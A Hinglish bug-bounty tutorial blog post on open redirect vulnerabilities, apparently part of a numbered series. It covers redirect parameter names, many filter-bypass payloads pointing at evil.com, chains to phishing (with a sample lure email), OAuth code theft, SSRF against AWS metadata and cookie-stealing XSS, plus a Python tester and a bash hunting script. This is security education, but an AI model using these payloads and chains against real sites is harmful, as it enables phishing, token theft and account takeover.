Aaj Kya Seekhenge?
- Open Redirect kya hai bilkul basics se
- Kahan dhundhen input points
- Bypass techniques elite level
- Impact chains phishing, OAuth bypass, SSRF
- Automated + Manual testing
- Complete bug bounty workflow
Kyun zaroori hai? Open Redirect akele $100-$500 bounty deta hai lekin SSRF ke saath, OAuth bypass ke saath, ya phishing chain mein yeh Critical ban jaata hai! Ek simple parameter se account takeover possible hai!
Open Redirect Kya Hai? Simple Analogy
Socho ek Trusted Receptionist hai company mein:
Normal:
Visitor: "Mujhe Conference Room A le chalo"
Receptionist: Conference Room A le jaata hai β
Open Redirect:
Attacker: "Visitor ko yahan se evil building
mein le jaao" β forged note
Receptionist: "Theek hai!" β blindly follow karta hai! π±
Problem:
β Visitor ne trusted company ka naam dekha
β Socha legitimate redirect hai
β Actually evil site pe pahunch gaya!Website mein:
Legitimate URL:
https://trusted-bank.com/login?next=https://trusted-bank.com/dashboard
Attacker ka URL:
https://trusted-bank.com/login?next=https://evil-phishing.com
β User trusted-bank.com ka link dekhta hai
β Click karta hai β evil-phishing.com pe redirect!
β Apna password enter karta hai! π±PART 1: Kahan Dhundhen Parameter Names
# βββ COMMON REDIRECT PARAMETERS ββββββββββ
?next=
?url=
?redirect=
?redirect_url=
?redirect_uri=
?return=
?return_url=
?returnUrl=
?returnTo=
?goto=
?dest=
?destination=
?target=
?link=
?to=
?ref=
?location=
?continue=
?forward=
?go=
?r=
?redir=
?out=
?view=
?callback=
?from=
?exit=
# βββ OAUTH/SSO SPECIFIC ββββββββββββββββββ
?redirect_uri=
?callback_url=
?post_logout_redirect_uri=
?success_url=
?error_url=
?after_login=
?after_logout=
# βββ HTTP HEADERS βββββββββββββββββββββββββ
Referer: header
Location: response headerPART 2: Basic Payloads Test Karo
Basic Test:
# Pehle apna server setup karo:
# Interactsh ya simple Python server:
python3 -m http.server 8888
# Basic payloads:
?next=https://evil.com
?url=https://evil.com
?redirect=https://evil.com
?redirect_uri=https://evil.com
# Agar redirect hota hai β Open Redirect confirmed! β
Variations Try Karo:
# Protocol variations:
?url=https://evil.com
?url=http://evil.com
?url=//evil.com β Protocol-relative!
?url=\/\/evil.com
?url=\\evil.com
# JavaScript protocol:
?url=javascript:alert(1) β XSS bhi possible!
?url=data:text/html,<script>alert(1)</script>PART 3: Bypass Techniques Elite Level!
Bypass 1: @ Symbol Trick
# Browser URL parsing:
https://trusted.com@evil.com
β Browser evil.com pe jaata hai!
β User sirf "trusted.com" dekhta hai URL mein!
?url=https://trusted.com@evil.com
?redirect=https://target.com@evil.comBypass 2: Subdomain Confusion
?url=https://evil.com.target.com
# Agar server check kare "target.com" string
# β evil.com.target.com bhi pass ho jaata hai!
?url=https://target.com.evil.com
?url=https://evil-target.com
?url=https://evilXtarget.comBypass 3: URL Fragment
?url=https://evil.com#target.com
?url=https://evil.com#.target.com
?url=https://evil.com/.target.com
# Fragment ke baad target.com β filter bypass!Bypass 4: CRLF + Whitespace
?url=https://evil.com%09
?url=https://evil.com%0a
?url=https://evil.com%0d
?url=https://evil.com%00
?url=%20https://evil.com
?url=%0ahttps://evil.comBypass 5: Double Slash
?url=//evil.com
?url=///evil.com
?url=////evil.com
?url=https:///evil.com
?url=/\evil.com
?url=\/evil.comBypass 6: URL Encoding
?url=https%3A%2F%2Fevil.com
?url=https%3A//evil.com
?url=%68%74%74%70%73%3A%2F%2Fevil.com
# Double encoding:
?url=https%253A%252F%252Fevil.comBypass 7: IP Address
?url=http://1.2.3.4 β IP directly
?url=http://0x1.0x2.0x3.0x4 β Hex IP
?url=http://16909060 β Decimal IP of 1.2.3.4Bypass 8: Open Redirect via Referer
GET /logout HTTP/1.1
Host: target.com
Referer: https://evil.com
# Logout ke baad Referer pe redirect kare?
β Open Redirect via header!PART 4: Impact Chains Yahan Asli Power Hai!
Chain 1: Open Redirect β Phishing
Step 1: Open Redirect dhundho:
https://trusted-bank.com/login?next=https://evil.com
Step 2: Evil site banao β trusted bank jaisi dikhti ho
Step 3: Email bhejo victim ko:
"Your account is compromised!
Click here to secure: https://trusted-bank.com/login?next=https://evil.com"
Step 4: Victim:
β URL mein trusted-bank.com dekhta hai β
β Click karta hai
β Evil site pe redirect hota hai
β Password enter karta hai β STOLEN! π
Impact: High β Critical!
Bounty: $500-$2000Chain 2: Open Redirect β OAuth Token Steal CRITICAL!
OAuth flow normal:
1. User β "Login with Google" click karta hai
2. Google β target.com/callback?code=ABC pe redirect karta hai
3. target.com code se access token leta hai
OAuth + Open Redirect attack:
1. target.com/oauth/start?redirect_uri=https://evil.com dhundho
2. Google ko lagta hai legitimate redirect_uri hai
(kyunki target.com ne register kiya tha)
3. Google β evil.com?code=ABC pe redirect karta hai!
4. evil.com code steal karta hai
5. Google account access! π΄
Yeh = Critical! Account Takeover!
Bounty: $3000-$10000+Chain 3: Open Redirect β SSRF
Agar server-side redirect follow karta hai:
?url=https://trusted.com/redirect?to=http://169.254.169.254/
Step 1: target.com/fetch?url=https://trusted.com/redirect?to=...
Step 2: Server trusted.com pe jaata hai
Step 3: trusted.com redirect karta hai β 169.254.169.254
Step 4: Server follow karta hai β AWS Metadata!
Open Redirect + SSRF = Critical!Chain 4: Open Redirect β XSS
?next=javascript:alert(document.cookie)
?url=data:text/html,<script>alert(1)</script>
# Agar JavaScript protocol allowed hai:
β XSS execution!
β Cookie steal!
β Account takeover!PART 5: OAuth redirect_uri Special Attention!
Bug bounty mein sabse valuable Open Redirect!
Normal OAuth:
POST /oauth/authorize
redirect_uri=https://target.com/callback
Attack β Exact match bypass:
redirect_uri=https://target.com/callback?next=https://evil.com
# Agar server only prefix check kare β Bypass!
redirect_uri=https://target.com.evil.com/callback
redirect_uri=https://target.com/callback/../../../redirect?url=evil.com
Path traversal bypass:
redirect_uri=https://target.com/oauth/../open-redirect?url=evil.com
# Agar bypass hua:
β OAuth token evil.com pe jaayega
β Account takeover!
β Critical bounty!PART 6: Automated Testing
Tool 1: Waybackurls + grep Fastest Method
# Redirect parameters dhundho historical URLs mein:
gau target.com | grep -iE \
"next=|url=|redirect=|return=|goto=|
dest=|destination=|target=|redir=|
redirect_uri=|callback=" \
> redirect_params.txt
echo "Redirect params: $(wc -l < redirect_params.txt)"
# Test karo:
cat redirect_params.txt | \
qsreplace "https://evil.com" | \
httpx -silent \
-location \
-mc 301,302,303 | \
grep "evil.com" > open_redirects.txtTool 2: Nuclei Open Redirect Templates
nuclei -l targets.txt \
-t ~/nuclei-templates/vulnerabilities/generic/open-redirect.yaml \
-o redirect_found.txt
nuclei -l targets.txt \
-tags redirect \
-o nuclei_redirects.txtTool 3: Custom Python Tester
#!/usr/bin/env python3
# open_redirect_test.py
import requests
import sys
TARGET_URL = sys.argv[1]
EVIL_DOMAIN = "https://evil-test-12345.com"
PAYLOADS = [
EVIL_DOMAIN,
f"//{EVIL_DOMAIN.replace('https://','')}",
f"///{EVIL_DOMAIN.replace('https://','')}",
f"https://trusted.com@{EVIL_DOMAIN.replace('https://','')}",
f"{EVIL_DOMAIN}#.trusted.com",
f"javascript:alert(1)",
f"%2F%2F{EVIL_DOMAIN.replace('https://','')}",
f"https:////{EVIL_DOMAIN.replace('https://','')}",
]
PARAMS = ["next","url","redirect","return",
"goto","dest","redir","target",
"redirect_url","returnUrl","continue"]
print(f"π Testing Open Redirect: {TARGET_URL}\n")
for param in PARAMS:
for payload in PAYLOADS:
test_url = f"{TARGET_URL}?{param}={payload}"
try:
r = requests.get(
test_url,
allow_redirects=False,
timeout=5,
verify=False
)
location = r.headers.get("Location","")
if "evil-test" in location or \
"javascript" in location.lower():
print(f"π΄ FOUND! Param: {param}")
print(f" Payload: {payload}")
print(f" Location: {location}")
print(f" URL: {test_url}\n")
except:
passPART 7: Complete Elite Workflow
#!/bin/bash
# open_redirect_hunt.sh
TARGET=$1
DIR="redirect_${TARGET}"
mkdir -p $DIR
echo "π Open Redirect Hunt: $TARGET"
echo "ββββββββββββββββββββββββββββββββ"
# Step 1: Historical URLs se redirect params
echo "π‘ Finding redirect parameters..."
gau $TARGET | grep -iE \
"next=|url=|redirect=|return=|goto=|
dest=|redir=|redirect_uri=|callback=" | \
uro > $DIR/redirect_urls.txt
echo "β
URLs: $(wc -l < $DIR/redirect_urls.txt)"
# Step 2: Live check
cat $DIR/redirect_urls.txt | \
httpx -silent -mc 200,301,302 \
> $DIR/live_redirects.txt
# Step 3: Payload inject + test
echo "π Testing payloads..."
cat $DIR/live_redirects.txt | \
qsreplace "https://evil.com" | \
httpx -silent \
-follow-redirects \
-location \
-mc 301,302 | \
grep "evil.com" > $DIR/open_redirects.txt
# Step 4: Nuclei scan
nuclei -l $DIR/live_redirects.txt \
-tags redirect,open-redirect \
-silent \
-o $DIR/nuclei_redirect.txt 2>/dev/null
# Step 5: OAuth redirect_uri check
echo "π OAuth redirect_uri check..."
gau $TARGET | grep -iE \
"redirect_uri=|callback_url=" | \
uro > $DIR/oauth_redirects.txt
echo "ββββββββββββββββββββββββββββββββ"
echo "π Results:"
echo "Redirect URLs : $(wc -l < $DIR/redirect_urls.txt)"
echo "Open Redirects : $(wc -l < $DIR/open_redirects.txt)"
echo "OAuth URIs : $(wc -l < $DIR/oauth_redirects.txt)"
echo "Nuclei Findings : $(wc -l < $DIR/nuclei_redirect.txt)"
echo "Results in : $DIR/"Open Redirect Cheat Sheet
# βββ BASIC PAYLOADS βββββββββββββββββββββββ
?next=https://evil.com
?url=//evil.com
?redirect=\/\/evil.com
# βββ BYPASS βββββββββββββββββββββββββββββββ
@evil.com β https://trusted.com@evil.com
#evil.com β https://trusted.com#evil.com
%09evil.com β Tab character
%0aevil.com β Newline
///evil.com β Triple slash
javascript:alert(1) β XSS via redirect
# βββ OAUTH BYPASS βββββββββββββββββββββββββ
redirect_uri=https://target.com/callback?url=evil.com
redirect_uri=https://target.com.evil.com
redirect_uri=https://target.com/../redirect?to=evil.com
# βββ CHAINS βββββββββββββββββββββββββββββββ
Open Redirect + Phishing β Social engineering
Open Redirect + OAuth β Account Takeover!
Open Redirect + SSRF β Internal access!
Open Redirect + XSS β Cookie steal!
# βββ TOOLS ββββββββββββββββββββββββββββββββ
gau + grep + qsreplace + httpx β Automated
nuclei -tags redirect β Templates
Manual Burp testing β Bypass testBounty Impact Guide
π’ Low ($100-200):
β Basic redirect to external site
β No authentication context
β Non-sensitive application
π‘ Medium ($200-500):
β Authenticated redirect
β Login flow redirect
β Phishing potential
π High ($500-2000):
β OAuth redirect_uri bypass
β Authentication token exposure
β SSRF chain potential
π΄ Critical ($2000-10000+):
β OAuth token steal β Account takeover
β SSRF chain β Internal access
β Admin panel redirectAaj Ka Homework
# 1. Waybackurls se redirect params dhundho:
gau hackerone.com | grep -iE "next=|url=|redirect=" | head -20
# 2. qsreplace install karo:
go install github.com/tomnomnom/qsreplace@latest
# 3. Practice:
echo "https://example.com/login?next=https://example.com" | \
qsreplace "https://evil.com"
# 4. Burp Suite mein manually test karo:
# Koi login page dhundho β next= parameter
# evil.com se replace karo β Redirect check karo
# 5. OAuth apps dhundho:
# "Login with Google/Facebook" wale apps
# redirect_uri parameter test karoQuick Revision
π Open Redirect = Unvalidated URL redirect
π Find = next=, url=, redirect=,
return=, goto=, dest=
π‘οΈ Bypass = @ trick, //, fragment,
encoding, whitespace
βοΈ Chains = + Phishing β Social eng
+ OAuth β Account takeover!
+ SSRF β Internal access!
+ XSS β Cookie steal!
π€ Tools = gau + qsreplace + httpx
nuclei -tags redirect
π° Alone = Low-Medium ($100-500)
π° With chain = Critical ($2000-10000+)!Meri Baatβ¦
Ek SaaS app pe maine dekha:
https://target.com/auth/logout?redirect=https://target.com/homeMaine test kiya:
https://target.com/auth/logout?redirect=https://evil.comRedirect ho gaya evil.com pe! Open Redirect confirmed.
Phishing PoC banaya lekin bounty sirf $200 thiΰ₯€
Phir socha OAuth bhi hai is app mein!
https://target.com/oauth/google/callback?
redirect_uri=https://target.com/auth/logout?redirect=https://evil.comGoogle OAuth token β target.com β logout β evil.com!
Token URL mein tha evil.com pe Google OAuth code mil gaya!
Account Takeover chain complete!
Bounty: $3,500 Critical! π
Lesson: Open Redirect akele weak hai lekin chain banao aur value 10x ho jaati hai!
Agle article mein Authentication Bypass Login page ko bypass karo, Admin bano, Tokens exploit karo! π₯
HackerMD Bug Bounty Hunter | Cybersecurity Researcher GitHub: BotGJ16 | Medium: @HackerMD
Previous: Article #21 Backup Files Exposure Next: Article #23 Authentication Bypass: Login Bypass Se Admin Tak!
#OpenRedirect #BugBounty #WebSecurity #EthicalHacking #Hinglish #OAuthBypass #HackerMD